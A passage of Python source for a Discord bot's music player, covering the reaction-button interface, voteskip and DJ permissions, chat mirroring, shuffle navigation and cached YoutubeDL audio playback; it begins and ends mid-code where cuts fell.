States.STOPPED\n error = CBException(\"Failed to start the player interface.\", e=e)\n await 
self.channel.send(embed=error.embed)\n else:\n await asyncio.sleep(1) # Safety sleep\n await self._build_interface()\n # Start playback if necessary\n if autoplay:\n self.autoplay_task = asyncio.ensure_future(\n self._autoplay(track_index=track_index))\n\n async def _autoplay(self, track_index=None):\n safety_timeout = 0\n while self.state == States.LOADING:\n if safety_timeout > 30:\n raise CBException(\"Autoplay failed.\")\n await asyncio.sleep(0.5)\n safety_timeout += 0.5\n asyncio.ensure_future(self.play(track_index=track_index, author=self.author))\n\n def update_tracklist(self):\n self.tracklist_update_time = time.time()\n self.tracklist = _get_tracklist(self.bot, self.guild)\n\n async def update_state(self):\n if self.state == States.STOPPED:\n return\n if not (self.voice_client and self.voice_channel):\n logger.warn(\"update_state detected that the bot disconnected. Stopping now.\")\n await self.stop(\n text=\"The player has been stopped due to an undetected disconnection.\")\n elif (\n (self.voice_client.is_playing() and self.voice_client.source != self.source) or\n self.guild.me not in self.voice_channel.members):\n logger.warn(\"update_state detected an unstopped instance. Stopping now.\")\n await self.stop(\n text=\"The player has been stopped due to a different audio source being in use.\")\n\n async def reset_player_messages(self):\n \"\"\"Rebuilds the set of 3 messages if one is somehow deleted.\"\"\"\n await self.set_new_message(self.message)\n self.mirror_last_notification = \"\"\n self.notification = \"A message was unexpectedly deleted.\"\n\n async def set_new_message(self, message, autoplay=False, track_index=None):\n \"\"\"Bumps up the player interface to the bottom of the channel.\"\"\"\n\n # Prevent issues with trying to set a new message too quickly\n if self.loading_interface:\n logger.warn(\"Ignoring interface refresh reques as the interface is still loading\")\n if autoplay:\n self.autoplay_task = asyncio.ensure_future(\n self._autoplay(track_index=track_index))\n return\n self.loading_interface = True\n\n if self.command_task:\n self.command_task.cancel()\n if self.progress_task:\n self.progress_task.cancel()\n if self.state_check_task:\n self.state_check_task.cancel()\n if self.chat_mirror_task:\n self.chat_mirror_task.cancel()\n if self.message:\n for old_message in (self.message, self.satellite_message, self.mirror_message):\n try:\n await old_message.delete()\n except Exception as e:\n logger.warn(\"Couldn't delete original messages: %s\", e)\n\n self.channel = message.channel\n self.author = message.author\n self.satellite_data = None # Force update\n asyncio.ensure_future(self._build_interface(resume=self.state == States.PLAYING))\n if autoplay:\n self.autoplay_task = asyncio.ensure_future(\n self._autoplay(track_index=track_index))\n\n async def _build_interface(self, resume=False):\n \"\"\"Sets up player messages and the main interface structure.\"\"\"\n self.state = States.LOADING\n self.loading_interface = True\n self.satellite_message = await self.channel.send(embed=discord.Embed(title=\"\\u200b\"))\n self.mirror_message = await self.channel.send(embed=discord.Embed(title=\"\\u200b\"))\n embed = discord.Embed(colour=discord.Colour(0xffab00))\n embed.add_field( # Title\n name=':arrows_counterclockwise: **[]**',\n value='**`[{}]` [ `0:00` / `0:00` ]**'.format('-' * 50), inline=False)\n embed.add_field(name='---', value='---', inline=False) # Info\n embed.add_field(name='---', value='---', inline=False) # Listeners\n embed.add_field(name='---', 
value='---\\n' * 6, inline=False) # Tracklist\n embed.add_field(name='---', value='---') # Notification\n self.embed = embed\n self.message = await self.channel.send(embed=embed)\n self.command_task = asyncio.ensure_future(self._command_listener(resume=resume))\n\n async def _progress_loop(self):\n \"\"\"Refreshes the progress bar.\"\"\"\n await asyncio.sleep(5)\n while True:\n await self.update_state()\n if self.state == States.PLAYING:\n self.update_listeners(update_interface=False)\n if time.time() - self.last_interface_update >= 4:\n asyncio.ensure_future(self.update_interface())\n asyncio.ensure_future(self.update_satellite())\n await asyncio.sleep(5)\n elif self.state in (States.PAUSED, States.LOADING):\n # TODO: Implement idle timeout\n await asyncio.sleep(1)\n else: # Stopped\n logger.warn(\"Progress loop wasn't cancelled for some reason. Stopping loop...\")\n return\n\n async def _chat_mirror_loop(self):\n \"\"\"Mirrors chat messages after 10 seconds.\"\"\"\n\n async def _delete_and_update(message):\n await asyncio.sleep(MIRROR_TIMER)\n if self.state == States.STOPPED or not self.mirror_chat:\n return\n try:\n await message.delete()\n except Exception as e:\n pass\n else:\n await self.update_mirror(new_chat=message)\n\n while True:\n message = await self.bot.wait_for('message')\n if (not self.mirror_chat or\n not message or\n self.state == States.STOPPED or\n message.channel != self.channel):\n continue\n\n # Don't log player messages by the bot or non-standard messages (like pins)\n player_messages = (self.message.id, self.satellite_message.id, self.mirror_message.id)\n if message.type is discord.MessageType.default and message.id not in player_messages:\n asyncio.ensure_future(_delete_and_update(message))\n\n async def _listener_loop(self):\n \"\"\"Checks the state of members in the voice channel.\"\"\"\n\n class VoiceChange(Enum):\n NORMAL, LEFT, JOINED = range(3)\n\n def check(member, before, after):\n if member.guild != self.guild:\n return VoiceChange.NORMAL\n elif not member == self.bot.user and (member.bot or not (before or after)):\n return VoiceChange.NORMAL\n elif after and after.channel == self.voice_channel:\n if not before or before.channel != self.voice_channel:\n return VoiceChange.JOINED\n elif before and before.channel == self.voice_channel:\n if not after or after.channel != self.voice_channel:\n return VoiceChange.LEFT\n return VoiceChange.NORMAL\n\n # Preliminary check\n self.listeners = len([it for it in self.voice_channel.members if not it.bot])\n\n # Wait on voice state updates to determine users entering/leaving\n while True:\n result = await self.bot.wait_for('voice_state_update')\n if not result:\n continue\n elif self.state == States.STOPPED:\n return\n member, before, after = result\n\n # Check for self changes\n if member == self.bot.user and member.guild == self.guild:\n if not after: # Disconnected\n # TODO: Consider adding failsafe stop\n logger.warn(\"Voice disconnected, detected from _listener_loop.\")\n return\n if before != after:\n logger.debug(\"Bot was dragged to a new voice channel.\")\n if after.channel == self.guild.afk_channel: # TODO: Act on AFK channel\n logger.warn(\"Moved to the AFK channel. Failsafe stopping.\")\n self.voice_channel = after.channel\n self.voice_client = self.guild.voice_client\n\n # Update listener count\n self.listeners = len([it for it in self.voice_channel.members if not it.bot])\n logger.debug(\"Voice state updated. 
Listeners: %s\", self.listeners)\n self.update_listeners(update_interface=False)\n\n voice_change = check(*result)\n if voice_change is VoiceChange.LEFT:\n if member.id in self.skip_voters:\n self.skip_voters.remove(member.id)\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n elif voice_change is VoiceChange.JOINED:\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n\n if self.listeners == 0:\n if self.auto_disconnect:\n asyncio.ensure_future(\n self.stop(\n text=(\n \"The player has been stopped due to all users leaving the channel.\"\n )\n )\n )\n else:\n self.autopaused = True\n self.notification = \"The player has been automatically paused\"\n asyncio.ensure_future(self.pause())\n\n def update_listeners(self, update_interface=True):\n \"\"\"Updates the number of listeners and skips the song if enough people have voted.\"\"\"\n\n current_listeners = [it.id for it in self.voice_channel.members]\n for member_id in self.skip_voters[:]:\n if member_id not in current_listeners:\n self.skip_voters.remove(member_id)\n\n # Skip if enough votes\n needed_votes = math.ceil(self.listeners * self.skip_threshold)\n if needed_votes and len(self.skip_voters) >= needed_votes:\n index_string = '[[Track{}]{}]'.format(\n ' {}'.format(self.track_index + 1) if self.mode == Modes.PLAYLIST else '',\n _build_shortlink(self.bot, self.now_playing))\n self.notification = \"{} was voteskipped ({} vote{})\".format(\n index_string, len(self.skip_voters), '' if len(self.skip_voters) == 1 else 's')\n del self.skip_voters[:]\n self._skip_track()\n elif update_interface:\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n\n async def update_interface(self, notification_text='', ignore_ratelimit=False):\n \"\"\"Calls the other functions to update the main interface.\"\"\"\n await self.update_notification(text=notification_text)\n await self.update_title()\n await self.update_info()\n await self.update_footer()\n if not ignore_ratelimit and time.time() - self.last_interface_update < 1:\n return\n try:\n await self.message.edit(content=None, embed=self.embed)\n self.last_interface_update = time.time()\n except discord.NotFound:\n await self.reset_player_messages()\n\n async def update_satellite(self):\n \"\"\"Updates the satellite with track data.\"\"\"\n\n if not self.now_playing and self.satellite_data: # Player stopped\n self.satellite_data = None\n await self.satellite_message.edit(embed=discord.Embed())\n return\n elif not self.now_playing or self.now_playing.extra == self.satellite_data:\n return\n self.satellite_data = extra = self.now_playing.extra\n\n embed = discord.Embed()\n keys = ('uploader', 'views', 'likes', 'dislikes', 'uploaded')\n if any(key in extra for key in keys):\n info_list = ['{}: {}'.format(key.title(), extra[key]) for key in keys if key in extra]\n embed.add_field(name='Info', value='\\n'.join(info_list))\n\n if 'description' in extra:\n description = extra['description']\n chunks = [description[it:it + 1000] for it in range(0, len(description), 1000)]\n if len(chunks) > 3:\n chunks = chunks[:3]\n chunks[-1] += '…'\n for index, chunk in enumerate(chunks):\n embed.add_field(name='Description' if index == 0 else '\\u200b', value=chunk)\n\n if 'thumbnail' in extra:\n embed.set_image(url=extra['thumbnail'])\n\n if 'artist_thumbnail' in extra:\n embed.set_thumbnail(url=extra['artist_thumbnail'])\n\n try:\n await self.satellite_message.edit(embed=embed)\n except discord.NotFound:\n await self.reset_player_messages()\n\n async def 
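# Aside on the voteskip quorum just shown in update_listeners: with the default
# skip_threshold of 0.5 set in __init__, math.ceil rounds ties upward, so a
# strict majority is never required but a lone listener can always self-skip.
# A small worked check of needed_votes = math.ceil(listeners * skip_threshold):
#
#     import math
#     skip_threshold = 0.5
#     for listeners in (1, 2, 3, 4, 5):
#         print(listeners, "->", math.ceil(listeners * skip_threshold))
#     # 1 -> 1, 2 -> 1, 3 -> 2, 4 -> 2, 5 -> 3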
update_mirror(self, new_notification=None, new_chat=None):\n \"\"\"Updates the mirror message with notification or chat data.\"\"\"\n\n if new_notification:\n if new_notification != self.mirror_last_notification:\n self.mirror_last_notification = new_notification\n self.mirror_notifications.append(new_notification)\n if new_chat:\n self.mirror_chats.append(new_chat)\n\n embed = discord.Embed()\n while sum(len(it) for it in self.mirror_notifications) > 1000:\n self.mirror_notifications.popleft()\n notifications = '\\u200b' + '\\n'.join(self.mirror_notifications)\n embed.add_field(name='Recent notifications:', value=notifications, inline=False)\n\n if self.mirror_chat:\n\n for _ in range(3):\n embed.add_field(name='\\u200b', value='\\u200b', inline=False)\n formatted_chats = []\n\n def _length_check(segment_index):\n \"\"\"Checks the length of a set of 4 messages given the segment.\"\"\"\n segment = formatted_chats[4 * segment_index:4 * segment_index + 4]\n return sum(len(it) for it in segment) < 1000\n\n # Format messages\n for message in self.mirror_chats:\n if message.attachments:\n attachment = ' [(Attachment)]({})'.format(message.attachments[0].url)\n else:\n attachment = ''\n if message.content:\n content = message.content\n elif message.embeds:\n title, description = message.embeds[0].title, message.embeds[0].description\n title_text = '{}: '.format(title) if title else ''\n description_text = description if description else '[No description]'\n content = '{}{}'.format(title_text, description_text)\n else:\n content = '[Empty message]'\n if len(content) > 500:\n content = content[:500] + '…'\n content = content.replace('```', '\\`\\`\\`')\n formatted_chats.append('[{}{}]: {}'.format(\n message.author.mention, attachment, content))\n\n # Remove messages if one is too long\n for it in range(2, -1, -1):\n while not _length_check(it):\n del formatted_chats[0]\n\n # Set embeds\n segments = [formatted_chats[it:it + 4] for it in range(0, 12, 4)]\n for index, segment in enumerate(segments):\n embed.set_field_at(\n index + 1, name='Recent chat messages:' if index == 0 else '\\u200b',\n value='\\u200b' + '\\n'.join(segment), inline=False)\n\n try:\n await self.mirror_message.edit(embed=embed)\n except discord.NotFound:\n await self.reset_player_messages()\n\n async def update_footer(self):\n \"\"\"Updates volume display, control type, and player mode in the footer.\"\"\"\n if self.volume < 0.3:\n volume_indicator = '\\U0001F508'\n elif self.volume < 0.6:\n volume_indicator = '\\U0001F509'\n else:\n volume_indicator = '\\U0001F50A'\n footer_text = '{}: {}% | {} | {}{}{} | Click \\u2753 for help'.format(\n volume_indicator,\n int(self.volume * 100),\n ('Public', 'Partially public', 'DJs only')[self.control],\n '\\U0001F500 ' if self.mode == Modes.PLAYLIST and self.shuffle else '',\n ('Playlist', 'Queue')[self.mode],\n ' | Mirroring chat' if self.mirror_chat else '')\n self.embed.set_footer(text=footer_text)\n\n async def update_title(self):\n \"\"\"Updates the now playing title and progress bar\"\"\"\n # Calculate progress and set embed color\n if self.state == States.PLAYING:\n progress = self.progress + (time.time() - self.start_time)\n status_icon = ':arrow_forward:'\n color = discord.Color(0x3b88c3)\n elif self.state == States.PAUSED:\n progress = self.progress\n status_icon = ':pause_button:'\n color = discord.Color(0xccd6dd)\n else:\n progress = 0\n status_icon = ':arrows_counterclockwise:'\n color = discord.Color(0xffab00)\n self.embed.color = color\n\n # Set title and progress\n if 
self.now_playing:\n title = _truncate_title(self.now_playing.title, limit=60)\n duration = self.now_playing.duration\n else:\n title = '---'\n duration = 0\n new_name = '{} **[{}]**'.format(status_icon, title)\n percentage = 0 if duration == 0 else progress / duration\n progress_bar = '\\u2588' * int(50 * percentage)\n new_value = '**`[{:-<50}]` [ `{}` / `{}` ]**'.format(\n progress_bar, utilities.get_time_string(progress),\n utilities.get_time_string(duration))\n\n self.embed.set_field_at(0, name=new_name, value=new_value, inline=False)\n\n async def update_info(self):\n \"\"\"Updates the info, listeners, and track list explorer display.\"\"\"\n # Listeners\n new_name = '{} listener{}'.format(self.listeners, '' if self.listeners == 1 else 's')\n new_value = '[ {} / {} ] :eject: votes needed to skip'.format(\n len(self.skip_voters), math.ceil(self.listeners * self.skip_threshold))\n self.embed.set_field_at(2, name=new_name, value=new_value, inline=False)\n\n # Tracklist slice\n total_tracks = len(self.tracklist)\n total_duration = sum(it.duration for it in self.tracklist)\n total_pages = max(int((total_tracks + 4) / 5), 1)\n self.page %= total_pages\n displayed_tracks = self.tracklist[self.page * 5:(self.page * 5) + 5]\n\n # Build individual track entries from slice\n info = ['---'] * 5 + ['Page [ {} / {} ]'.format(self.page + 1, total_pages)]\n for index, entry in enumerate(displayed_tracks):\n duration = utilities.get_time_string(entry.duration)\n entry_index = (self.page * 5) + index + 1\n full_title = entry.title.replace('`', '').replace('*', '')\n title = _truncate_title(full_title)\n use_indicator = entry_index == self.track_index + 1 and self.mode == Modes.PLAYLIST\n info[index] = ('**[`{}{}`]{}**: ({}) *{}*'.format(\n '▶ ' if use_indicator else '', entry_index,\n _build_shortlink(self.bot, entry), duration, title))\n new_value = '\\n'.join(info)\n\n # Total tracks and runtime\n player_mode = 'queued' if self.mode == Modes.QUEUE else 'in the playlist'\n if total_tracks > 0:\n new_name = '{} track{} {} (runtime of {}):'.format(\n total_tracks, '' if total_tracks == 1 else 's', player_mode,\n utilities.get_time_string(total_duration, text=True))\n else:\n new_name = 'No tracks {}'.format(player_mode)\n\n self.embed.set_field_at(3, name=new_name, value=new_value, inline=False)\n\n # Info\n if self.now_playing:\n new_name = 'Info:'\n time_ago = time.time() - self.now_playing.timestamp\n index_string = '[[Track{}]{}]'.format(\n ' {}'.format(self.track_index + 1) if self.mode == Modes.PLAYLIST else '',\n _build_shortlink(self.bot, self.now_playing))\n new_value = 'Playing: {} Added by <@{}> {} ago'.format(\n index_string, self.now_playing.userid,\n utilities.get_time_string(time_ago, text=True))\n else:\n new_name = '---'\n new_value = '---'\n\n # Determine next track\n if len(self.tracklist) == 0:\n next_index = -1\n new_value += '\\n---'\n elif self.now_playing is None:\n next_index = 0 if self.mode == Modes.QUEUE else self.track_index\n elif self.track_index + 1 >= len(self.tracklist):\n next_index = 0\n else:\n if self.mode == Modes.PLAYLIST:\n next_index = self.track_index + 1\n else:\n next_index = 0\n\n # Show next track if available\n if next_index != -1:\n next_track = self.tracklist[next_index]\n if next_index >= 0:\n if self.mode == Modes.PLAYLIST and self.shuffle:\n new_value += '\\nUp next: [Track ?]'\n else:\n new_value += '\\nUp next: {}'.format(\n _build_track_details(self.bot, next_track, next_index))\n\n self.embed.set_field_at(1, name=new_name, value=new_value, 
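# Aside on the progress bar rendered by update_title above: it fills
# int(50 * progress/duration) block characters and pads the rest with dashes
# via the '{:-<50}' format spec ('-' fill, '<' left-align, width 50).
# The rendering in isolation (a sketch, not part of the player):
#
#     def render_bar(progress, duration, width=50):
#         percentage = 0 if duration == 0 else progress / duration
#         filled = "\u2588" * int(width * percentage)
#         return "[{:-<{width}}]".format(filled, width=width)
#
#     render_bar(90, 300)   # 15 of 50 cells filled
#     render_bar(0, 0)      # all dashes when nothing is playing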
inline=False)\n\n async def update_notification(self, text=''):\n if text:\n self.notification = text\n elif not self.notification:\n self.notification = 'No notification.'\n if self.notification != self.mirror_last_notification:\n asyncio.ensure_future(self.update_mirror(new_notification=self.notification))\n self.embed.set_field_at(4, name='Notification:', value=self.notification)\n\n def _skip_track(self):\n \"\"\"Skips the current track (even if paused).\"\"\"\n delta = 1 if self.mode == Modes.PLAYLIST else 0\n if self.mode == Modes.PLAYLIST and self.shuffle:\n if self.now_playing:\n self.shuffle_stack.append(self.now_playing.id)\n if len(self.tracklist) > 1:\n new_track_index = random.randint(0, len(self.tracklist) - 2)\n if new_track_index >= self.track_index:\n new_track_index += 1\n else:\n new_track_index = 0\n else:\n new_track_index = self.track_index + delta\n asyncio.ensure_future(self.play(track_index=new_track_index))\n\n async def _track_timer(self, sleeptime, use_skip=False):\n \"\"\"Sleeps until the end of the song or cutoff. Plays the next track afterwards.\"\"\"\n logger.debug(\"Sleeping for %s seconds. Time: %s\", sleeptime, time.time())\n track_check = self.now_playing\n await asyncio.sleep(sleeptime)\n logger.debug(\"Finished sleeping for %s seconds. Time: %s\", sleeptime, time.time())\n await self.update_state()\n if self.state == States.STOPPED or track_check != self.now_playing:\n logger.debug(\"The track timer resumed?\")\n return\n while self.state == States.LOADING:\n logger.warn(\"Player was moved while the track was loading.\")\n await asyncio.sleep(1)\n if self.mode == Modes.PLAYLIST and self.shuffle:\n logger.debug(\"Adding track %s to the shuffle stack\", track_check.title)\n self.shuffle_stack.append(track_check.id)\n if len(self.tracklist) > 1:\n new_track_index = random.randint(0, len(self.tracklist) - 2)\n if new_track_index >= self.track_index:\n new_track_index += 1\n else:\n new_track_index = 0\n asyncio.ensure_future(self.play(track_index=new_track_index, skipped=use_skip))\n else:\n logger.debug('_track_timer is moving on: %s', use_skip)\n asyncio.ensure_future(self.play(skipped=use_skip))\n\n def _get_delay(self, config_update=False): # Gets track delay with cutoff\n if self.now_playing.duration > self.threshold:\n duration = self.cutoff\n use_skip = self.now_playing\n else:\n duration = self.now_playing.duration\n use_skip = False\n if config_update:\n current_progress = self.progress + time.time() - self.start_time\n else:\n current_progress = self.progress\n return (max(duration - current_progress, 0), use_skip)\n\n async def play(self, track_index=None, skipped=False, wrap_track_numbers=True, author=None):\n \"\"\"Plays (the given track).\n\n Keyword arguments:\n track_index -- The specific track to play.\n In queue mode, -1 indicates to repeat the current track.\n skipped -- Whether or not the last track was skipped due to a length constraint.\n wrap_track_numbers -- Wraps out-of-bounds track indices to the nearest edge.\n author -- If provided, displays a notification on who started the player.\n \"\"\"\n # Ignore loading player\n if self.state in (States.LOADING, States.STOPPED):\n return\n\n # Resume player if paused\n if (self.state == States.PAUSED and\n self.now_playing and self.progress and track_index is None):\n self.state = States.PLAYING\n self.voice_client.resume()\n self.start_time = time.time()\n self.timer_task = asyncio.ensure_future(self._track_timer(*self._get_delay()))\n author_text = '{} resumed the 
player'.format(author.mention) if author else ''\n asyncio.ensure_future(self.update_interface(notification_text=author_text))\n self.autopaused = False # Reset single-time resume state\n return\n\n # No more tracks left to play\n if len(self.tracklist) == 0 and not (track_index == -1 and self.state == States.PLAYING):\n self.notification = \"There are no more tracks in the queue\"\n if self.voice_client.is_playing():\n self.voice_client.stop()\n self.source = None\n self.now_playing = None\n self.first_time_startup = True # Reset so non-DJs can start the player again\n self.progress = 0\n self.state = States.PAUSED\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n asyncio.ensure_future(self.update_satellite())\n return\n\n # No track index was given - act as a skip\n if track_index is None and self.now_playing:\n if self.mode == Modes.PLAYLIST:\n self.track_index = (self.track_index + 1) % len(self.tracklist)\n\n # A specific track index was given\n elif track_index is not None:\n if track_index != -1 and not 0 <= track_index < len(self.tracklist):\n if wrap_track_numbers:\n if track_index >= len(self.tracklist):\n track_index = 0\n elif track_index < 0:\n track_index = -1\n else:\n self.notification = (\n 'Index must be between 1 and {} inclusive'.format(len(self.tracklist)))\n asyncio.ensure_future(self.update_interface())\n return\n\n # Wrap a backwards skip to the end of the playlist in playlist mode\n if self.mode == Modes.PLAYLIST:\n if track_index == -1:\n track_index = len(self.tracklist) - 1\n self.track_index = track_index\n\n # Track from playlist\n if self.mode == Modes.PLAYLIST:\n track = self.tracklist[self.track_index]\n\n # Track from queue\n else:\n\n # Repeat current track\n if track_index == -1:\n if self.now_playing:\n track = self.now_playing\n else:\n return\n\n # Skip to specific track by removing it from the database first\n else:\n if track_index is None:\n track_index = 0\n track = self.tracklist[0 if track_index == -1 else track_index]\n data.db_delete(\n self.bot, 'playlist', table_suffix=self.guild.id,\n where_arg='id=%s', input_args=[track.id])\n self.update_tracklist()\n\n self.autopaused = False # Reset single-time resume state\n\n # Setup the player\n logger.debug(\"Preparing to play the next track.\")\n self.page = int(self.track_index / 5)\n del self.skip_voters[:]\n if self.state == States.PLAYING:\n if self.voice_client.is_playing():\n self.voice_client.stop()\n if self.timer_task:\n self.timer_task.cancel()\n self.first_time_startup = not bool(self.now_playing)\n self.state = States.LOADING\n self.now_playing = track\n sound_file = data.get_from_cache(self.bot, None, url=track.url)\n\n # Audio not found in cache, download now instead\n if not sound_file:\n asyncio.ensure_future(self.update_interface())\n logger.debug(\"Not found in cache. Downloading...\")\n\n try:\n options = {'format': 'bestaudio/best', 'noplaylist': True}\n downloader = YoutubeDL(options)\n sound_file = await data.add_to_cache_ydl(self.bot, downloader, track.url)\n except Exception as e: # Attempt to redownload from base url\n logger.warn(\"Failed to download track %s\\n%s\", track.url, e)\n self.notification = \"Failed to download {}. 
Failsafe skipping...\".format(\n track.title)\n self.state = States.PAUSED\n self._skip_track()\n return\n\n # TODO: Add exception handling\n # TODO: Change ffmpeg_options for docker version\n #ffmpeg_options = '-protocol_whitelist \"file,http,https,tcp,tls\"'\n #audio_source = discord.FFmpegPCMAudio(sound_file, before_options=ffmpeg_options)\n audio_source = discord.FFmpegPCMAudio(sound_file)\n\n # Set volume and play audio\n audio_source = discord.PCMVolumeTransformer(audio_source, volume=self.volume)\n self.voice_client.play(audio_source)\n self.source = audio_source\n\n # Record progress time\n self.progress = 0\n self.start_time = time.time()\n self.state = States.PLAYING\n self.timer_task = asyncio.ensure_future(self._track_timer(*self._get_delay()))\n if skipped:\n self.notification = (\n 'The track *{}* was cut short because it exceeded '\n 'the song length threshold of {} seconds.'.format(\n _build_hyperlink(self.bot, skipped), self.threshold))\n elif self.first_time_startup and author:\n self.notification = '{} started the player'.format(author.mention)\n\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n data.add(self.bot, __name__, 'last_index', self.track_index, guild_id=self.guild.id)\n\n async def pause(self, author=None):\n if (self.state in (States.PAUSED, States.LOADING, States.STOPPED) or\n self.voice_client is None or not self.voice_client.is_playing()):\n return\n if self.timer_task:\n self.timer_task.cancel()\n self.voice_client.pause()\n self.state = States.PAUSED\n self.progress += time.time() - self.start_time\n author_text = '{} paused the player'.format(author.mention) if author else ''\n asyncio.ensure_future(self.update_interface(\n notification_text=author_text, ignore_ratelimit=True))\n\n async def stop(self, text=\"The player has been stopped.\"):\n logger.debug(\"Stopping the player!\")\n await utilities.stop_audio(self.bot, self.guild)\n self.state = States.STOPPED\n self.now_playing = None\n try:\n if self.voice_client:\n self.voice_client.stop()\n if self.timer_task:\n self.timer_task.cancel()\n if self.command_task:\n self.command_task.cancel()\n if self.progress_task:\n self.progress_task.cancel()\n if self.state_check_task:\n self.state_check_task.cancel()\n if self.chat_mirror_task:\n self.chat_mirror_task.cancel()\n except Exception as e:\n logger.warn(\"Failed to stop some task. %s\", e)\n try:\n asyncio.ensure_future(self.satellite_message.delete())\n asyncio.ensure_future(self.mirror_message.delete())\n asyncio.ensure_future(self.message.clear_reactions())\n asyncio.ensure_future(self.message.edit(content=text, embed=None))\n except Exception as e:\n logger.warn(\"Failed to modify the original message %s\", e)\n pass\n\n async def track_navigate(self, use_skip, member):\n \"\"\"Navigates the track (next, previous, or repeat). 
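# Aside on the long-track policy implemented by _get_delay above: a track whose
# duration exceeds `threshold` only plays for `cutoff` seconds and is then
# reported as skipped; otherwise the timer runs to the end of the track, minus
# any progress already played. A stripped-down sketch of that decision (the
# real method returns the track object itself, not a bool, as use_skip):
#
#     def get_delay(duration, progress, threshold, cutoff):
#         effective = cutoff if duration > threshold else duration
#         return max(effective - progress, 0), duration > threshold
#
#     get_delay(duration=120, progress=30, threshold=600, cutoff=300)  # (90, False)
#     get_delay(duration=900, progress=30, threshold=600, cutoff=300)  # (270, True)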
Returns True if successful.\"\"\"\n is_dj = data.has_custom_role(self.bot, __name__, 'dj', member=member)\n\n # Build skip text\n use_repeat = time.time() - self.start_time >= 10 and self.now_playing\n self_skip = False\n if use_skip:\n skip_format = '{} skipped {}'\n if self.now_playing and self.now_playing.userid == member.id:\n self_skip = True\n elif not self.now_playing:\n skip_format = '{} played the queued track'\n else:\n if self.now_playing and (use_repeat or self.mode == Modes.QUEUE):\n skip_format = '{} repeated {}'\n elif self.now_playing:\n skip_format = '{} skipped back from {}'\n else:\n skip_format = '{} skipped back a track'\n\n # Skip track only if the user is a DJ or was the one that added it\n if not self_skip and not is_dj and not self.control == Control.ALL:\n return False\n\n if self.now_playing:\n track_details = _build_track_details(\n self.bot, self.now_playing, self.track_index)\n else:\n track_details = ''\n self.notification = skip_format.format(member.mention, track_details)\n\n # Determine track delta\n if self.mode == Modes.PLAYLIST:\n # Repeat track if more than 10 seconds have elapsed\n start_delta = 1 if self.now_playing else 0\n delta = start_delta if use_skip else (0 if use_repeat else -1)\n else:\n delta = 0 if use_skip else -1\n\n if self.mode == Modes.PLAYLIST and self.shuffle and delta != 0:\n last_track = None\n if not use_skip and self.shuffle_stack: # Check shuffle stack first\n last_track_id = self.shuffle_stack.pop()\n for new_track_index, track in enumerate(self.tracklist):\n if track.id == last_track_id:\n last_track = track\n break\n if last_track is None:\n if self.now_playing:\n self.shuffle_stack.append(self.now_playing.id)\n if len(self.tracklist) > 1:\n new_track_index = random.randint(0, len(self.tracklist) - 2)\n if new_track_index >= self.track_index:\n new_track_index += 1\n else:\n new_track_index = 0\n else:\n new_track_index = self.track_index + delta\n asyncio.ensure_future(self.play(track_index=new_track_index))\n return True\n\n async def _command_listener(self, resume=False):\n valid_commands = ('⏮', '⏯', '⏭', '⏹', '🔀', '🎵', '⬅', '⏺', '➡', '⏏', '❓')\n\n async def _add_buttons():\n \"\"\"Adds the buttons in the background to show interface immediately.\"\"\"\n for reaction in valid_commands:\n try:\n await self.message.add_reaction(reaction)\n except Exception as e:\n logger.warn(\"Failed to add reaction: %s\", e)\n\n # Check reactions are proper\n for reaction in self.message.reactions:\n users = await self.bot.get_reaction_users(reaction)\n for user in users:\n if user != self.bot.user:\n await self.message.remove_reaction(reaction.emoji, user)\n\n # Safety interface update\n asyncio.ensure_future(self.update_interface())\n await asyncio.sleep(1)\n self.loading_interface = False\n\n self.progress_task = asyncio.ensure_future(self._progress_loop())\n self.state_check_task = asyncio.ensure_future(self._listener_loop())\n self.chat_mirror_task = asyncio.ensure_future(self._chat_mirror_loop())\n self.page = int(self.track_index / 5)\n asyncio.ensure_future(self.update_interface())\n asyncio.ensure_future(_add_buttons())\n\n # Startup - finished loading basics\n if self.state == States.LOADING:\n self.state = States.PLAYING if resume else States.PAUSED\n\n try: # TODO: Remove try/except block\n while True:\n # Wait on reaction command\n kwargs = {'check': lambda r, u: r.message.id == self.message.id and not u.bot}\n logger.debug(\"Waiting on command...\")\n result = await self.bot.wait_for('reaction_add', **kwargs)\n if result is 
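# Aside on shuffle back-navigation as implemented in track_navigate above:
# shuffle_stack acts as a play history. Moving forward pushes the current
# track id; "previous" pops the stack and looks that id up in the tracklist.
# A stripped-down sketch of the same mechanism:
#
#     import random
#     history, tracklist, current = [], ["a", "b", "c", "d"], 0
#
#     def shuffle_forward():
#         global current
#         history.append(tracklist[current])
#         current = random.choice([i for i in range(len(tracklist)) if i != current])
#
#     def shuffle_back():
#         global current
#         if history:
#             current = tracklist.index(history.pop())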
None or self.state == States.STOPPED:\n return\n elif result[1] == self.bot.user:\n continue\n\n # Check validity of reaction\n command, member = result[0].emoji, result[1]\n logger.debug(\"Player interaction: %s: %s\", member, command)\n is_dj = data.has_custom_role(self.bot, __name__, 'dj', member=member)\n if not await utilities.can_interact(self.bot, member, channel_id=self.channel.id):\n continue\n asyncio.ensure_future(self.message.remove_reaction(command, member))\n if not is_dj and (member not in self.voice_channel.members or\n self.state == States.LOADING or\n command not in valid_commands):\n continue\n\n # Check player control type\n restricted_commands = [\n set(), # Public\n (valid_commands[0],) + valid_commands[3:5], # Partially public\n valid_commands[:10] # DJ Only\n ][self.control]\n if command in restricted_commands and not is_dj:\n logger.debug(\"Ignoring command (insufficient permissions)\")\n continue\n\n # Play/pause and skip\n if command in valid_commands[:3]:\n logger.debug(\"Play|pause and skip selected\")\n\n # Play/pause\n if command == valid_commands[1]:\n permissions = self.control == Control.ALL or is_dj\n if self.state == States.PLAYING and permissions:\n asyncio.ensure_future(self.pause(author=member))\n elif self.state == States.PAUSED:\n if permissions or self.autopaused or self.first_time_startup:\n asyncio.ensure_future(self.play(author=member))\n\n # Skip\n elif self.state != States.LOADING:\n use_skip = command == valid_commands[2]\n asyncio.ensure_future(self.track_navigate(use_skip, member))\n\n # Stop player\n elif command == valid_commands[3]:\n await self.stop(\n text=\"The player has been stopped by {}.\".format(member.mention))\n return\n\n # Shuffle mode\n elif command == valid_commands[4]:\n if self.mode == Modes.PLAYLIST:\n self.shuffle = not self.shuffle\n data.add(\n self.bot, __name__, 'shuffle', self.shuffle, guild_id=self.guild.id)\n asyncio.ensure_future(self.update_interface())\n\n # Generate tracklist\n elif command == valid_commands[5]:\n logger.debug(\"Tracklist selected\")\n if self.tracklist:\n if 